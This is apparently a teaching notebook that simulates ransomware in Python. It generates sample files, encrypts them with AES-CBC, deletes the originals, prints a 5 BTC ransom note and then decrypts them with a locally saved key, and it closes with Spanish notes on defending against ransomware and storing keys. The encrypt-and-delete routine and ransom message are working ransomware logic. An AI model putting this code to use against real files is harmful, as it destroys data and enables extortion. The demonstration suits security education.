In [17]:
import os
import random
import string
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
from Crypto.Random import get_random_bytes
import base64
import json

In [18]:
TARGET_FOLDER = "important_files"

### Sample data creation

In [19]:
def generate_random_text(length=100):
    characters = string.ascii_letters + string.digits + string.punctuation + " \n"
    return ''.join(random.choice(characters) for _ in range(length))

if not os.path.exists(TARGET_FOLDER):
    os.makedirs(TARGET_FOLDER)

num_files = 5
for i in range(num_files):
    file_name = f"file_{i+1}.txt"
    full_path = os.path.join(TARGET_FOLDER, file_name)
    
    length = random.randint(100, 500)
    content = generate_random_text(length)
    
    with open(full_path, "w") as f:
        f.write(content)
    
    print(f"File created: {file_name} ({length} characters)")

print("\nFiles in folder:")
for file in os.listdir(TARGET_FOLDER):
    full_path = os.path.join(TARGET_FOLDER, file)
    size = os.path.getsize(full_path)
    print(f"{file} - {size} bytes")

File created: file_1.txt (412 characters)
File created: file_2.txt (313 characters)
File created: file_3.txt (215 characters)
File created: file_4.txt (444 characters)
File created: file_5.txt (248 characters)

Files in folder:
file_4.txt - 444 bytes
file_5.txt - 248 bytes
file_1.txt - 412 bytes
file_2.txt - 313 bytes
file_3.txt - 215 bytes
file_4.txt.encrypted - 304 bytes
file_3.txt.encrypted - 384 bytes
file_2.txt.encrypted - 208 bytes
file_5.txt.encrypted - 352 bytes
file_1.txt.encrypted - 432 bytes


### AES Encryption

In [20]:
# The goal is to simulate an attack which will remove the original file and replace it with an encrypted one.
def encrypt_file(file_path, key):
    iv = get_random_bytes(16)
    
    cipher = AES.new(key, AES.MODE_CBC, iv)
    
    with open(file_path, 'rb') as f:
        data = f.read()
    
    encrypted_data = cipher.encrypt(pad(data, AES.block_size))
    
    complete_data = iv + encrypted_data
    
    with open(file_path + '.encrypted', 'wb') as f:
        f.write(complete_data)
    
    os.remove(file_path)
    
    return True

def decrypt_file(encrypted_file_path, key):
    if not os.path.exists(encrypted_file_path):
        print(f"File {encrypted_file_path} does not exist.")
        return False
    
    with open(encrypted_file_path, 'rb') as f:
        complete_data = f.read()
    
    iv = complete_data[:16]
    encrypted_data = complete_data[16:]
    
    decipher = AES.new(key, AES.MODE_CBC, iv)
    
    try:
        # Dont forget to remove padding!
        decrypted_data = unpad(decipher.decrypt(encrypted_data), AES.block_size)
        
        original_file_path = encrypted_file_path.replace('.encrypted', '')
        with open(original_file_path, 'wb') as f:
            f.write(decrypted_data)
        
        os.remove(encrypted_file_path)
        
        return True
    except Exception as e:
        print(f"Error decrypting {encrypted_file_path}: {str(e)}")
        return False

### Ransomware

In [21]:
def run_ransomware():
    key = get_random_bytes(32)
    
    with open("secret_key.key", "wb") as f:
        # Obviously, in a real scenario, this would be sent to the attacker...
        f.write(key)
    
    print("🔒 Starting file encryption...")
    
    encrypted_files = 0
    for file in os.listdir(TARGET_FOLDER):
        if not file.endswith('.encrypted'):  
            full_path = os.path.join(TARGET_FOLDER, file)
            if os.path.isfile(full_path):
                if encrypt_file(full_path, key):
                    encrypted_files += 1
                    print(f"Encrypted: {file}")
    
    print(f"\n✅ Encryption completed. {encrypted_files} files have been encrypted.")
    print("⚠️ To recover your files, you will need the decryption key.")
    
    print("\n" + "="*50)
    print("🚨 YOUR FILES HAVE BEEN ENCRYPTED 🚨")
    print("To recover them, you must pay 5 BTC")
    print("="*50)
    
    return key

# Run the ransomware
generated_key = run_ransomware()

🔒 Starting file encryption...
Encrypted: file_4.txt
Encrypted: file_5.txt
Encrypted: file_1.txt
Encrypted: file_2.txt
Encrypted: file_3.txt

✅ Encryption completed. 5 files have been encrypted.
⚠️ To recover your files, you will need the decryption key.

🚨 YOUR FILES HAVE BEEN ENCRYPTED 🚨
To recover them, you must pay 5 BTC


In [22]:
def recover_files(key=None):
    if key is None:
        try:
            with open("secret_key.key", "rb") as f:
                key = f.read()
        except FileNotFoundError:
            print("❌ Key file not found. Unable to recover files.")
            return False
    
    print("🔓 Starting file decryption...")
    
    decrypted_files = 0
    for file in os.listdir(TARGET_FOLDER):
        if file.endswith('.encrypted'):
            full_path = os.path.join(TARGET_FOLDER, file)
            if decrypt_file(full_path, key):
                decrypted_files += 1
                print(f"Decrypted: {file}")
    
    print(f"\n✅ Decryption completed. {decrypted_files} files have been recovered.")
    return True

# Recover files using the previously generated key
recover_files(generated_key)

🔓 Starting file decryption...
Decrypted: file_4.txt.encrypted
Decrypted: file_3.txt.encrypted
Decrypted: file_2.txt.encrypted
Decrypted: file_5.txt.encrypted
Decrypted: file_1.txt.encrypted

✅ Decryption completed. 5 files have been recovered.


True

### ¿Cómo podríamos evitar ataques de ransomware?

Se pueden evitar ataques de ransomware implementando un enfoque multicapa que incluye realizar copias de seguridad siguiendo la regla 3-2-1 y verificando su restauración, mantener actualizados el sistema operativo, aplicaciones y antivirus para corregir vulnerabilidades, y capacitar a los usuarios en la identificación de phishing, ingeniería social y prácticas como el uso de contraseñas seguras y autenticación de dos factores. 

Además, es recomendable aplicar el principio de mínimo privilegio en el control de acceso, usar firewalls, segmentar redes, implementar sistemas de detección de intrusiones y filtrado web, y contar con un plan de respuesta a incidentes probado regularmente. 

### ¿Qué tan importante es almacenar claves de manera segura?

Bastante. Es recomendado usar Hardware Security Modules (HSM) o sistemas de gestión de claves (KMS), aplicar técnicas como el cifrado y la división de claves, establecer controles de acceso estrictos, auditar operaciones y guardar copias en ubicaciones seguras, evitando almacenarlas en el mismo sistema que los datos o enviarlas por canales no seguros.